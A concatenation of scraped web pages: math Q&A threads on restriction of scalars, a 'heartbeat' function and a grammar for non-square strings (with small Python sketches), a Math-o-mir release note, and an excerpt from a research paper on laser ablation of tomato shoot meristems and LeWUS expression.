6*b1*b2^2*b4 + 12*b1*b3^2*b4 - 12*b2*b3*b4^2 - 4*b1*b4^3,
     2/3*b1^3*b2 - 2/3*b1*b2^3 + 2/3*b1^3*b3 - 2*b1*b2^2*b3 + 4*b1*b2*b3^2 + 4/3*b1*b3^3 - 2*b1^2*b2*b4 + 2/3*b2^3*b4 + 4*b1^2*b3*b4 - 4*b2^2*b3*b4 - 4*b2*b3^2*b4 + 8/3*b3^3*b4 - 4*b1*b2*b4^2 - 4*b1*b3*b4^2 + 4/3*b2*b4^3 - 8/3*b3*b4^3 + x*y + 2/3*z*w]

This is a $4$-dimensional ideal. The condition "to be nonzero" is not yet added. You might also want to try computing a Gröbner basis with respect to a good monomial ordering (I don't have the computing power right now). (The fractions are there in the equations because absolute_vector_space() uses a basis different from the obvious one, but it doesn't matter.)

"then using the vector space structure of $K$ and changing the ring of the vectors to a polynomial ring in the same variables over $\mathbb{Q}$" Didn't know I could do that, thanks for that idea! – (comment, 2020-02-28)
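The restriction-of-scalars step that `absolute_vector_space()` automates can be sanity-checked by hand. The plain-Python sketch below (my own illustration, not part of the Sage session above) expands $a^2+6b^2$ with $a = x+yi$, $b = z+wi$ and confirms that its rational coordinates are $x^2-y^2+6z^2-6w^2$ and $2xy+12zw$, matching (up to the sign and scaling introduced by the non-obvious basis) the $x,y,z,w$ terms visible in the ideal generators:

```python
# Restriction of scalars from Q(i) down to Q by hand: one equation over
# Q(i) becomes two equations over Q, one per coordinate in the basis (1, i).
def p1_coordinates(x, y, z, w):
    """Rational coordinates of a^2 + 6*b^2 for a = x + y*i, b = z + w*i."""
    re = x * x - y * y + 6 * (z * z - w * w)  # coefficient of 1
    im = 2 * x * y + 12 * z * w               # coefficient of i
    return re, im

# Cross-check the hand expansion against direct complex arithmetic
# (toy integer values chosen arbitrarily for the check).
x, y, z, w = 3, 2, 1, 5
val = complex(x, y) ** 2 + 6 * complex(z, w) ** 2
re, im = p1_coordinates(x, y, z, w)
```

For these values both routes give −139 + 72i, which is the kind of coefficient matching the `R_to_4S` helper performs for every monomial at once.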
http://mathoverflow.net/questions/119280/is-there-any-heartbeat-like-function/119281
# Is there any heartbeat like function? [closed]

I'm looking for a function whose graph looks something like this:

I tried to figure it out myself, but I have no idea how to manage it.

f(x) = ...

## closed as off topic by Steven Landsburg, Will Sawin, Chris Godsil, Noah Stein, Dan Petersen, Jan 18 '13 at 17:38

The heart beat function for a dead guy is defined by $f(x)=0.$ – Joseph Van Name Jan 19 '13 at 0:02

Hodgkin-Huxley gives a system of differential equations whose solutions look pretty close. As in, the normal pattern is a limit cycle. – AHusain Apr 25 at 21:46
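Short of solving the Hodgkin-Huxley equations, a purely cosmetic "heartbeat" can be faked by summing a few Gaussian bumps per period, mimicking the P-QRS-T features of an ECG trace. This is my own sketch, not from the answers above, and all the constants are illustrative guesses rather than clinical values:

```python
import math

def bump(t, center, width, height):
    """A smooth Gaussian spike of the given height at `center`."""
    return height * math.exp(-(((t - center) / width) ** 2))

def heartbeat(t, period=1.0):
    """ECG-like waveform: P, Q, R, S and T features repeated every period."""
    s = t % period                         # phase within the current beat
    return (bump(s, 0.20, 0.030, 0.15)     # P wave
            + bump(s, 0.37, 0.010, -0.12)  # Q dip
            + bump(s, 0.40, 0.012, 1.00)   # R spike (the big one)
            + bump(s, 0.43, 0.010, -0.25)  # S dip
            + bump(s, 0.60, 0.040, 0.30))  # T wave

# The waveform is exactly periodic and its maximum sits at the R spike.
peak = max((i / 1000 for i in range(1000)), key=heartbeat)
```

Plotting `heartbeat` over a few periods gives the familiar spiky trace; tuning the bump positions and widths changes the "rhythm".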
https://math.stackexchange.com/questions/2171178/understanding-the-context-free-grammar-of-the-following-language
Understanding the context free grammar of the following language

The set of all strings over alphabet {a, b} not of the form ww for any w. No string of odd length can be of the form ww. We use the nonterminal symbols A and B to generate all odd-length strings where the center characters are a and b, respectively.

S -> AB|BA|A|B
A -> aAa|aAb|bAa|bAb|a
B -> aBa|aBb|bBa|bBb|b

To understand why AB and BA are guaranteed to generate strings not of the form ww, understand that A builds an odd-length string, say of length 2k + 1, where k characters precede an a which precedes k more characters. Similarly, B generates a string, say of length 2m + 1, where m a's and b's precede one b which precedes m more a's and b's. If we concatenate one to the other, we get a string of length 2k + 2m + 2: an even-length string, where the middle a of the portion generated by A is k + m + 1 characters away from the central b generated by B. That means that the first k + m + 1 characters cannot be fully replicated in the final k + m + 1 characters.

The first question I have about this proof is that I think they only intend to generate all the strings of odd length, but there are also strings of even length not of the form ww. Can you explain in an easier way why that grammar works?

• Since $A$ and $B$ both generate strings of odd length, the productions $S\to AB$ and $S\to BA$ generate strings of even length. You have quoted an argument that the even-length strings generated by $AB$ and $BA$ are exactly the ones that are not of the form $ww$. What do you find unclear about this argument?
– hmakholm left over Monica Mar 4 '17 at 10:15

Let $L(G)$ be the language which can be derived from the given grammar $G$ $$S \to AB \mid BA \mid A \mid B \\ A \to aAa \mid aAb \mid bAa \mid bAb \mid a \\ B \to aBa \mid aBb \mid bBa \mid bBb \mid b \\$$ and the desired language $L$ be $$L = \Sigma^* \setminus L' \\ \Sigma = \{ a, b \} \\ L' = \{ ww \mid w \in \Sigma^* \}$$

The nonterminals $A$ and $B$ each derive words of odd length, and together they derive all odd-length words from $L$: a rule $$X \to a X a \mid a X b \mid b X a \mid b X b \mid x$$ grows a word by two symbols in each of the four possible ways and finishes on a central symbol $x$, so the derived word $w$ has $\lvert w \rvert = 2 k + 1$ with $k \in \mathbb{N}_0$. This leaves the even-length words from $L$: $S$ can turn into $AB$ or $BA$, which gives words $uv$ or $vu$, where $u$ and $v$ are of odd length; note that $u$ and $v$ need not have the same length.

To understand why $AB$ and $BA$ are guaranteed to generate strings not of the form $ww$, understand that $A$ builds an odd-length string, say of length $2k + 1$, where $k$ characters precede an $a$ which precedes $k$ more characters. Similarly, $B$ generates a string, say of length $2m + 1$, where $m$ $a$'s and $b$'s precede one $b$ which precedes $m$ more $a$'s and $b$'s. If we concatenate one to the other, we get a string of length $2k + 2m + 2$: an even-length string, where the middle $a$ of the portion generated by $A$ is $k + m + 1$ characters away from the central $b$ generated by $B$. That means that the first $k + m + 1$ characters cannot be fully replicated in the final $k + m + 1$ characters.

This explains the application of $S \to AB$, giving a word $$(a\mid b)^k \, \underbrace{a \, (a \mid b)^k \, (a \mid b)^m}_{1+k+m} b (a \mid b)^m \in \Sigma^{k+1+k+m+1+m} \\$$ with $k, m \in \mathbb{N}_0$.
Comparing this with an equal-length string of the form $ww$: $$\overbrace{x_1 \dotsb x_{k+m+1}}^w \, \overbrace{x_1 \dotsb x_{k+m+1}}^w$$ The requested repetition of $w$ boils down to the condition $$(ww)_i = x_i = (ww)_{i + k+m+1} \quad (i \in \{1,\dotsc,k+m+1\}) \quad (*)$$ We know the central $a$ of the $A$ production is at position $k+1 \le k+m+1$, thus in the first half, and the central $b$ of the $B$ production is at position $k+1+k+m+1 > k+m+1$, thus in the second half. And the condition $(*)$ is not met, as $$(ww)_{k+1} = a \ne (ww)_{k+1+k+m+1} = b$$ A similar argument holds for the words derived from $S\to BA$. What is left open is whether these two productions give all even-length words from $L$; a priori, $L(G)$ might just be a proper subset of $L$.

• .........-> means I got it. – daniel Mar 16 '17 at 21:55
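The point left open at the end, whether the grammar really produces all non-squares, can at least be checked exhaustively for short strings. Here is a brute-force Python sketch of mine, using the characterisation that a string is derivable iff it has odd length, or splits into two odd-length parts whose center characters are (a, b) or (b, a):

```python
from itertools import product

def in_grammar(s):
    """Is s derivable from S -> AB | BA | A | B, with
    A -> aAa|aAb|bAa|bAb|a and B -> aBa|aBb|bBa|bBb|b ?
    A derives exactly the odd-length strings with center 'a', and B those
    with center 'b', so membership reduces to a center-split check."""
    n = len(s)
    if n % 2 == 1:
        return True                      # S -> A or S -> B covers all odd strings
    for i in range(1, n, 2):             # split into two odd-length parts
        u, v = s[:i], s[i:]
        centers = (u[len(u) // 2], v[len(v) // 2])
        if centers in (('a', 'b'), ('b', 'a')):
            return True                  # S -> AB or S -> BA applies
    return False

def is_square(s):
    n = len(s)
    return n % 2 == 0 and s[: n // 2] == s[n // 2:]

# Exhaustive check for all nonempty strings up to length 10.
ok = all(in_grammar(s) == (not is_square(s))
         for n in range(1, 11)
         for s in map(''.join, product('ab', repeat=n)))
```

The square "abab", for instance, has no valid split (both splits give equal center characters), while "aabb" does, which matches the argument in the answer.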
https://mathomir.wordpress.com/2011/12/06/math-o-mir-v1-62-released-the-velociraptor/
I released the v1.62 and you can download it from the homepage. This version is nicknamed "the velociraptor" because it is the fastest blackboard-to-computer math writing tool in the world. (Lucky me.)

Keyboard handling news:

• You can now use ALT+Space (or SHIFT+Space) to toggle between math-typing and text-typing mode. This way you can easily mix math and plain text while you are typing your artwork.
• The toolbox accelerator table is expanded with new shortcuts. It also shows already-used shortcuts now.
• The comma character can be used as a decimal separator now. To make this possible, check the option "Options->Keyboard->Allow comma as a decimal separator".
• You can quickly save your document by using the CTRL+S keystroke. (As a result, the single-shot formatting is renamed to one-shot formatting and is activated by the CTRL+O keystroke.)
• You can now add a 'hat' over a variable you just entered by using the double '^' stroke. You can add an arrow by using ALT+comma… (strange, isn't it?)
• You can use the keystrokes \{, \[, \(, \|, \}, \], \) to insert a single bracket only.
• Triple (!!!) ALT+right keystroke inserts the |-> operator. Further, using the '=>' keystroke you can insert the double right arrow. Using the '***' keystroke you can enter center-dots.
• The \ep command is implemented as a short form for the \epsilon command. The \mid command is also implemented.
• When working with keyboard selections you can use the following keystrokes now: b (bold), i (italic), u (underline), o (overline), s (strikeout), r (red), g (green), n (formatting normalization)
• The following parentheses-generating keystrokes are enabled: '<>', '[)', '(]', '||'
• You can add a + or – sign to the exponent by using the ALT+plus and ALT+minus keystrokes.
Other news:

• Analysis button for function plotting – shows local minimum, maximum and intersection points.
• New functions can be plotted now: sec, cosec, arcsin, arccos, arctan, arccot, sh, ch, th, cth
• You can now point at the moving dot to select the whole object.
• You can copy equation images to other applications by using the standard Copy/Paste menu options.
• New operators are added: :=, =:, :<=>, #, |->
• The F2 key (zoom in) will now follow your mouse pointer if the mouse was moved less than one second prior to the F2 usage.
• The mouse wheel will scroll the window when the mouse pointer hovers over the vertical scroll bar.
• In addition, you can now dedicate the mouse wheel to window scrolling – in this case you must use CTRL+wheel for zoom in/out. To make this option active, check the “View->Zoom->Use CTRL for wheel zoom” menu option.
• The “Wide keyboard cursor” option makes your blinking cursor fat so you can see it better. Use “Options->Selections->Wide keyboard cursor”.
• Automatic vertical guidelines – when your mouse pointer is nearly aligned with the left side of an equation, a thin green line will appear. To toggle the guidelines on/off use the F12 key.
• There is a new HTML help file.
https://cob.silverchair.com/dev/article/130/17/4073/52262/Microsurgical-and-laser-ablation-analysis-of?searchresult=1
Plants exhibit life-long organogenic and histogenic activity in a specialised organ, the shoot apical meristem. Leaves and flowers are formed within the ring-shaped peripheral zone, which surrounds the central zone, the site of the stem cells. We have undertaken a series of high-precision laser ablation and microsurgical tissue removal experiments to test the functions of different parts of the tomato meristem, and to reveal their interactions. Ablation of the central zone led to ectopic expression of the WUSCHEL gene at the periphery, followed by the establishment of a new meristem centre. After the ablation of the central zone, organ formation continued without a lag. Thus, the central zone does not participate in organogenesis, except as the ultimate source of founder cells. Microsurgical removal of the external L1 layer induced periclinal cell divisions and terminal differentiation in the subtending layers. In addition, no organs were initiated in areas devoid of L1, demonstrating an important role of the L1 in organogenesis. L1 ablation had only local effects, an observation that is difficult to reconcile with phyllotaxis theories that invoke physical tension operating within the meristem as a whole. Finally, regeneration of L1 cells was never observed after ablation. This shows that while the zones of the meristem show a remarkable capacity to regenerate after interference, elimination of the L1 layer is irreparable and causes terminal differentiation.

The shoot apical meristem (SAM) serves as a source of cells for organ formation during postembryonic growth. In order to fulfil this function over years (or centuries in trees), the meristem has to maintain a separate population of cells that serve for self maintenance. The two functions of the meristem, organ formation and self maintenance, are associated with different areas of the meristem (Steeves and Sussex, 1989; Lyndon, 1998). Stem cells are located in the central zone (CZ).
Owing to their cell division activity, daughter cells are continuously displaced from the centre towards the peripheral zone (PZ) at the flank, where they become competent to form organs. Considering the dynamic properties of the meristem, the maintenance of meristem integrity requires precise coordination of cell division, cell expansion and differentiation (for reviews, see Fletcher, 2002; Weigel and Jürgens, 2002; Gross-Hardt and Laux, 2003). Genetic analysis in Arabidopsis and Petunia has identified the WUSCHEL (WUS) and CLAVATA (CLV) genes as key players in the specification and maintenance of stem cells (Clark et al., 1997; Mayer et al., 1998; Fletcher et al., 1999; Brand et al., 2000; Stuurman et al., 2002). WUS is expressed in a cell cluster in the CZ, several cell layers below the summit. WUS function induces stem cell identity in the overlying cells of the CZ. Because of this inductive role, the WUS-expressing cell cluster is referred to as the organising centre (OC) of the meristem (Mayer et al., 1998). A negative feedback loop limits WUS expression, thereby preventing accumulation of excess stem cells (for reviews, see Simon, 2001; Fletcher, 2002; Gross-Hardt and Laux, 2003). This negative regulation requires the function of the CLAVATA (CLV) signalling pathway. The CLV3 peptide ligand, produced by the stem cells, is perceived by the CLV1 receptor kinase, which is expressed in the cells below the stem cells. Superimposed on the functional subdivision in CZ and PZ, the meristem is organised in layers (Steeves and Sussex, 1989; Lyndon, 1998). The external L1 layer covers the subepidermal L2 layer and the remaining internal tissues, referred to as L3. The layered organisation of the meristem is maintained by stereotyped cell division patterns in L1 and L2. This leads to separated cell lineages that can be maintained for years (Tilney-Basset, 1986).
Although the layered organisation of the meristem is found in virtually all angiosperms, its functional relevance is still unclear. Since the three meristem layers cooperate in organ formation, some sort of communication is required to coordinate their development (Szymkowiak and Sussex, 1996). Most information on layer interactions comes from analysis of periclinal chimeras in which one or two of the meristem layers are mutant, and the remaining layer(s) wild type. Such studies have revealed extensive communication between the layers. For example, in tomato flowers the number and the size of organs are largely determined by the interior layers (Szymkowiak and Sussex, 1992; Szymkowiak and Sussex, 1993). Conversely, in flowers of an Antirrhinum periclinal chimera, the wild-type L1 layer could restore the mutant phenotype in the interior layers of floricaula mutants (Hantke et al., 1995). In this case, the L1 layer induced the complete developmental program in L2 and L3 to give rise to fertile flowers. Such inductive interactions between meristem layers are reminiscent of induction between the three germ layers in animal embryogenesis (Gilbert, 2000). Mutants have provided a wealth of information on intercellular interactions in the meristem (Simon, 2001; Fletcher, 2002; Gross-Hardt and Laux, 2003). However, in many cases, the phenotypes of meristem mutants are pleiotropic, and in some mutants such as wuschel or shoot meristemless, a normal meristem is never established (Long et al., 1996; Mayer et al., 1998). This limits the use of such mutants for studies on dynamic intercellular interactions. In such cases, it is helpful to induce controlled lesions that are limited temporally and spatially. Physical ablation of cells has successfully been employed to reveal cell-to-cell communication in the root meristem (van den Berg et al., 1995; van den Berg et al., 1997).
The advantage of such experiments is that they start from a normal meristem which can, after experimental interference, reorganise itself according to the natural regulatory mechanisms. Classical microsurgical experiments have shown that needle pricking of the CZ did not lead to meristem arrest (Pilkington, 1929; Loiseau, 1959; Sussex, 1964). In all these studies, some kind of regeneration was reported; however, the results and their interpretation differed considerably. Pilkington mentions briefly that after pricking of the centre 'regeneration followed in nearly every case' (Pilkington, 1929). Loiseau gives a detailed description of the peripheral expansion, the regeneration of several new meristem centres and of fasciations after destruction of the CZ (Loiseau, 1959). He takes these results as evidence for the importance of the PZ, and for the dispensability of the CZ ('La destruction des cellules apicales n'interrompt pas le fonctionnement de l'apex; ces cellules ne sont donc pas indispensables' – the destruction of the apical cells does not interrupt the functioning of the apex; these cells are therefore not indispensable). Finally, Sussex reports that after puncturing of the apex 'axial growth ceased and one of the apical flanks grew out as the new meristem' (Sussex, 1964). Despite the initial differences in interpretation, these classical studies have led to the widely accepted notion that destruction of the meristem centre leads to the establishment of one or more new growth centres at the periphery (Steeves and Sussex, 1989). It is of considerable interest to interpret the surgical experiments in the framework of the recent molecular models, and vice versa. With this in mind, we revisited the classical surgical experiments. We used technical innovations from the last half-century, such as tissue culture, high-resolution stereo light and scanning electron microscopy, and laser-based ablation techniques to increase the temporal and spatial resolution of the experiments.
In addition, a number of control experiments support the notion that the effects induced by the ablations are not a general stress response but specifically shed light on endogenous developmental processes. Moreover, we monitored the expression of key developmental genes after the microsurgical manipulations and thereby enable a link to be made between the two types of experimental approaches.

### Plant growth, in vitro culture and treatment of apices

Tomato plants (Lycopersicon esculentum cv Moneymaker) were grown as described previously (Reinhardt et al., 1998). Shoot apices were dissected and cultured as described previously (Fleming et al., 1997) on Murashige and Skoog (MS) medium containing 0.01 μM gibberellic acid A3 (Fluka, Switzerland) and 0.01 μM kinetin (Sigma). Salicylic acid (Sigma), jasmonic acid (Sigma), hydrogen peroxide (Fluka) and Paraquat (1,1′-dimethyl-4,4′-bipyridinium dichloride; Fluka) were diluted in DMSO to give 100× stock solutions. These were diluted directly in prewarmed (60°C) lanolin containing 3% w/w paraffin (Merck), and applied manually with yellow plastic pipette tips. After chemical treatments and laser ablation, apices were further cultured on synthetic medium.

### Laser ablations

Ablation of the meristem was conducted with a Q-switched Er:YAG laser that emits infrared radiation at a wavelength of 2.94 μm. Er:YAG laser radiation shows a high ablation efficiency and precision, which, by virtue of the high absorption coefficient in water (absorption coefficient is about 10,000 cm-1, corresponding to an optical penetration depth of approximately 1 μm), leads to thermally damaged zones adjacent to the ablation site that are restricted to a few micrometers (Frenz et al., 1996). Q-switching was performed by an FTIR modulator as described previously (Könz et al., 1993). The pulse duration was 60 nanoseconds. The laser was operated at a repetition rate of 2 Hz.
The radiation was guided from the laser to the operating microscope through an optical sapphire fibre with a core diameter of 125 μm and focused with a lens system to a spot of approximately 40 μm in diameter on the surface of the meristem. The pulse energy used was 0.3 mJ for ablation of the L1 layer (one pulse applied), and 1.5 mJ for deeper ablations (1 pulse for the ablation of the stem cells, and 10 consecutive pulses for the ablation of the entire CZ).

### Cloning of LeWUS

A cDNA library was constructed using mRNA isolated from tomato meristems and the SMART library kit (Clontech). A 350 bp fragment of the LeWUS gene was obtained by polymerase chain reaction (PCR) on DNA from the meristem library using the Triplex F primer (Clontech) and the WUS4R primer (5′-GCCTTCAATCTTTCCGTACTGTCT-3′), which matches the conserved region of the Petunia PhWUS gene (Stuurman et al., 2002) (GenBank accession number AF481951). Based on sequence information from the 350 bp fragment, we designed the WUS10F primer (5′-CAACACAACATAGAAGATGGTGG-3′). A 1200 bp fragment amplified with the primers WUS10F and Triplex R (Clontech) was cloned into pBluescript and used for generating 35S-labelled riboprobes. The sequence of LeWUS was deposited in GenBank (accession number AJ538329).

### In situ hybridisation and microscopy

In situ hybridisations were carried out either with 35S-labelled riboprobes as described by Reinhardt et al. (Reinhardt et al., 1998), or with dig-labelled riboprobes according to the method of Vernoux et al. (Vernoux et al., 2000). Silver grain signal was visualised on a Zeiss LSM310 confocal microscope as described previously (Reinhardt et al., 1998), and appears as yellow grains on a blue background. For scanning electron microscopic analysis, apices were viewed with an S-3500N variable pressure scanning electron microscope from Hitachi (Tokyo, Japan), equipped with a cool stage. In digital images, lanolin paste was pseudocoloured for clarity.
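The laser parameters quoted in the Methods can be sanity-checked with a little arithmetic: an absorption coefficient of about 10,000 cm-1 corresponds to an optical penetration depth of 1/α = 1 μm, and the stated pulse energies over a 40 μm spot imply fluences of roughly 24 J/cm² (0.3 mJ) and 119 J/cm² (1.5 mJ). A short sketch (parameter values are taken from the text above; the fluence figures are derived estimates, not stated in the paper):

```python
import math

ALPHA_CM = 10_000        # absorption coefficient of water at 2.94 um, cm^-1 (from the text)
SPOT_DIAMETER_UM = 40    # focused spot diameter on the meristem surface (from the text)

# Optical penetration depth 1/alpha: depth at which intensity falls to 1/e.
penetration_depth_um = (1 / ALPHA_CM) * 1e4   # convert cm -> um

# Fluence = pulse energy / spot area (derived estimate).
spot_area_cm2 = math.pi * (SPOT_DIAMETER_UM / 2 * 1e-4) ** 2
fluence_L1 = 0.3e-3 / spot_area_cm2   # 0.3 mJ pulse used for L1 ablation, J/cm^2
fluence_CZ = 1.5e-3 / spot_area_cm2   # 1.5 mJ pulse used for deeper ablations, J/cm^2

print(penetration_depth_um)                    # 1.0, matching the ~1 um quoted above
print(round(fluence_L1), round(fluence_CZ))    # 24 119
```

The ~1 μm penetration depth is what confines thermal damage to a few micrometres around the ablation site.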
For live imaging, developing tomato apices were cultured on plates and repeatedly photographed with a Sony DKC-5000 digital camera mounted on a Nikon SMZ-U stereoscope. Plastic sections were prepared as described previously (Loreto et al., 2001) with one modification: OsO4 was omitted. Semithin sections (5 μm) were viewed on a Zeiss Axioskop2 equipped with an Axiocam camera.

### Laser ablation at the meristem

The shoot apical meristem is organised in a central zone (CZ; Fig. 1A,B, light blue) that harbours the stem cells (dark blue), and in a peripheral zone (PZ, yellow) in which organ formation takes place. Superimposed on this functional subdivision into CZ and PZ, the meristem is organised in three cell layers (L1, L2 and L3) that are clonally separated because of their stereotyped cell division patterns (Fig. 1B). In L1 and L2, the cells divide anticlinally, i.e. both daughter cells remain in the original layer, whereas in L3, cell divisions occur in all planes. The three layers cooperate in organ formation (Fig. 1B, arrowhead). In the CZ, a population of cells that expresses the WUSCHEL gene (red) induces stem cell identity in the above cells (Mayer et al., 1998), and therefore, is referred to as the organising centre (OC). Whereas the CZ includes all undifferentiated cells distal to the region of primordium formation, the stem cells constitute only the small cell population at the summit. Each meristem layer has a few stem cells [1-3 stem cells per layer as estimated by Stewart and Dermen (Stewart and Dermen, 1970)]; consequently, the meristem contains a total set of up to 10 stem cells. Fig. 1. Organisation of the shoot apical meristem, and schematic representation of the ablations performed in this study. (A) SEM micrograph of a vegetative shoot apical meristem of tomato. P3, P2 and P1 indicate young primordia. P1 is just being initiated at the flank. (B-F) Schematic representation of a meristem as in A.
(B) The meristem consists of the central zone (CZ, light blue) that harbours the stem cells (dark blue) and the peripheral zone (PZ, yellow) in which organs are formed. An organising centre that expresses the marker gene LeWUS (red) induces stem cell identity in the above cells. Superimposed on the zonation (CZ and PZ), the meristem is organised in layers, namely the external L1 layer, the subepidermal L2 layer and the remaining cells, called L3. All three layers cooperate in organ formation (arrowhead). (C) Ablation of the entire CZ. (D) Ablation of the stem cells. (E) Ablation of the L1 layer in the CZ. (F) Ablation of the entire L1 layer. Scale bar: 100 μm. Previous experiments indicated that after ablation of single cells in the L1 layer, the dead cells were gradually displaced from the meristem without further consequences for meristem development (M. Muster and C.K., unpublished). Therefore, we wanted to ablate larger cell populations such as the entire CZ (Fig.
1C), the distal part of the CZ (Fig. 1D) or only the L1 layer (Fig. 1E,F). To achieve this, we connected an infrared laser to an optic fibre and a lens that focused the beam to a spot of approximately 40 μm in diameter. This set-up allowed us to ablate groups of cells simultaneously and to vary the energy in a wide range. Repeated high energy pulses at the same spot ablated the entire CZ (Fig. 1C), whereas single high energy pulses ablated only the 4-5 most superficial cell sheets in the CZ (Fig. 1D; see Materials and Methods). To generate superficial lesions of only L1 cells (Fig. 1E), single ablations at low energy were performed. For the ablation of the entire L1 layer (Fig. 1F), we developed a microsurgical technique (see below).

### Ablation of the central zone does not affect organ formation but leads to the establishment of a new meristem centre

To reveal the function of the CZ in organ formation and meristem maintenance, we generated lesions in the meristem centre that were approximately 40 μm wide and 100 μm deep (compare to a meristem diameter of approximately 150 μm) (Fig. 2A,C,D). These lesions eliminated the CZ including the LeWUS-expressing cells in the L3 layer, which is located approximately 50 μm below the summit of the meristem (Fig. 2B, compare with Fig. 3A,B). After such ablations, leaf formation continued without delay (Fig. 2E,G,I). Primordium initiation rate may even have been slightly higher than in control apices, i.e. after 3 days, apices with lesions had formed 1.95±0.4 (s.d.) new primordia (n=15) compared to 1.54±0.29 (s.d.) new primordia in controls (n=7). Also, the position of new primordia was normal, i.e. new primordia diverged from the next older primordia by approximately 137°. In general, the hole closed within 2 days (Fig. 2F). Later, the lesions were, in most cases, gradually displaced from the meristem centre (16 out of 22; Fig. 2G,H,I).
We presume that this displacement was caused by the activation of a new meristem centre at the flank. In 3 out of 22 cases, two new centres were initiated concomitantly at opposite sides of the lesion, resulting in the split of the meristem (Fig. 2J). In such cases, leaf position sometimes becomes irregular (Fig. 2J; Fig. 3G). In the remaining cases (3 out of 22), the lesion remained on the meristem. These results show that after elimination of the entire CZ, including the LeWUS-expressing cells, organ formation continued without an obvious lag. Fig. 2. Organ formation and meristem maintenance after ablations of the CZ. Yellow arrowheads indicate the position of the lesion. (A) Longitudinal section through a meristem immediately after ablation. The ablation eliminated the entire CZ and projected more than 100 μm into the meristem. (B) Longitudinal section through a control meristem hybridised with a dig-labelled antisense probe against LeWUS. The signal in the meristem centre appears brown. (D,F,H) Transverse sections; (C,E,G,I,J) scanning electron micrographs. (C) Scanning electron micrograph of a meristem with ablated CZ, in top view. (D) Transverse section of a meristem after ablation of the CZ. (E-J) Development of the meristem after ablation of the CZ. After 2 days, a new primordium was formed at the expected site (E), and the hole closed (F). After 4 days, four new primordia had been formed (G), the lesion was displaced from the centre towards the flank, and a new meristem centre (star) was established (G,H). After 6 days, the lesion was removed from the meristem and displaced onto the stem (I), or two new meristem centres had been established on either side of the lesion (J). P3, P2, and P1 indicate leaf primordia that were present at the beginning of the experiment; I1, I2, I3, and I4 indicate primordia formed after the ablation. In some cases, primordia were removed to allow manipulation or visualisation. Scale bars: 100 μm. Fig. 3. Expression of the meristem marker genes LeWUS and LeT6 in the meristem after ablation of the CZ. Gene expression was visualised by in situ hybridisation with 35S-labelled riboprobes. Signal appears as yellow grains. All images are transverse sections, except for I and J which are longitudinal sections. Position of the lesion is indicated by yellow arrowheads. (A-G) Expression of LeWUS. (H-L) Expression of LeT6. (A) Expression of LeWUS in a control meristem. (B) Expression of LeWUS immediately after ablation of the CZ (yellow arrowhead). No LeWUS expression can be detected.
(C) Expression of LeWUS 1 day after ablation of the CZ. A ring-shaped area around the lesion expresses LeWUS at low levels (arrows). (D) Expression of LeWUS 2 days after ablation of the CZ. The lesion (arrowhead) is closed, and the LeWUS signal becomes confined to one side of the lesion. (E) Expression of LeWUS 4 days after ablation of the CZ. The LeWUS-expressing zone at the flank has resolved into a new WUS centre with normal dimensions (compare with A). (F) Expression of LeWUS 6 days after ablation of the CZ. A new functional meristem centre with a normal WUS centre has been re-established. (G) Expression of LeWUS 4 days after ablation of the CZ. Two new WUS centres are evident at opposite sides of the lesion. (H) Expression of LeT6 in a control meristem. Note down-regulation of LeT6 in the youngest primordium (P1) and at the site of incipient leaf formation (I1). (I) Expression of LeT6 in a control meristem. Note down-regulation of LeT6 in the youngest (P1) and second youngest primordium (P2). (J) Expression of LeT6 6 hours after ablation of the CZ. LeT6 remains active at the periphery of the meristem and is only decreased in the vicinity of the lesion. (K) Expression of LeT6 5 days after ablation of the CZ. The lesion is displaced, and LeT6 is expressed in the new meristem centre and excluded from leaf primordia. (L) Expression of LeT6 4 days after ablation of the CZ. Two new LeT6-expressing meristems are induced on opposite sides of the lesion. P3, P2, and P1 indicate leaf primordia that were present at the beginning of the experiment; I1, I2, I3, and I4 indicate primordia formed after the ablation. Scale bars: 100 μm.
### Establishment of a new meristem centre is associated with ectopic induction of the WUSCHEL gene

The cells in the CZ and in the PZ differ in cell size, subcellular organisation, cell division rate, gene expression, and the ability to form organs (Steeves and Sussex, 1989; Lyndon, 1998; Fletcher, 2002; Reinhardt and Kuhlemeier, 2002). Therefore, if cells at the periphery are to reorganise a new meristem centre, they need to be reprogrammed. The WUSCHEL gene in Arabidopsis confers stem cell identity to the overlying cell layers (Mayer et al., 1998). Therefore, WUSCHEL is a good candidate for a role in reinitiation of a new centre, and a good marker for CZ identity. WUSCHEL expression and loss-of-function phenotypes are conserved between Arabidopsis and Petunia hybrida, a close relative of tomato (Stuurman et al., 2002). We monitored the expression of a tomato WUS homologue, LeWUS, after ablation of the CZ. Ablation of the CZ eliminated the LeWUS-expressing cells completely (Fig. 3A,B). However, after 1 day, LeWUS was ectopically induced in a ring-shaped region surrounding the lesion (Fig. 3C, arrows). Two days after the ablation, LeWUS expression became stronger and confined to one side of the lesion (Fig. 3D). After 4 days, a new LeWUS-expressing cell cluster was established, comparable in size with the LeWUS expression domain in control meristems (Fig. 3E, compare with 3A). After 6 days, a functional meristem was evident that grew out to the side, away from the lesion (Fig. 3F). Sometimes, two new LeWUS-expressing centres (WUS centres) were established on opposite sides of the lesion (Fig. 3G). Such meristems are likely to represent early stages of apices that would have split at later stages (compare with Fig. 2J). Organ formation continued after ablations of the CZ, indicating that basic meristem functions in the PZ were not affected.
In order to confirm the maintenance of meristem identity in the PZ, we analysed the expression of the LeT6 homeobox gene (also referred to as TKn2), a marker for meristem identity (Chen et al., 1997; Parnis et al., 1997). In untreated controls, LeT6 was consistently expressed in the CZ and the PZ but down-regulated in the leaf primordia and the site of incipient leaf formation (I1) (Fig. 3H,I), in a manner similar to the homologous genes KNOTTED1 in maize (Jackson et al., 1994) and SHOOT MERISTEMLESS in Arabidopsis (Long and Barton, 2000). This is in contrast to previous reports that found LeT6 to be expressed across the meristem, with only moderate reduction in leaf primordia (Chen et al., 1997; Parnis et al., 1997). After ablation of the CZ, LeT6 continued to be expressed in the remaining cells at levels comparable to those in the controls (Fig. 3J). In parallel with the re-establishment of one or two new meristem centres, LeT6-expressing cells increased either on one (Fig. 3K), or on two opposite sides of the lesion (Fig. 3L). Taken together, we have shown that after ablation of the CZ, LeWUS is induced in cells at the flank within 1 day. This increase in LeWUS expression is unlikely to be caused by proliferation of a few LeWUS-expressing cells that might have escaped destruction. Also, the new LeWUS signal always occurred at some distance from the lesion. Therefore, the LeWUS mRNA at the flank appears to result from ectopic transcriptional induction of LeWUS in cells that did not express WUS before the ablation. LeWUS induction preceded the establishment of a new meristem centre by approximately 2 days. In parallel with ongoing organogenesis, the meristem marker gene LeT6 continued to be expressed at the periphery, even after ablation of all LeWUS-expressing cells.
### Ablation in the PZ and stress treatments do not affect the function of the CZ

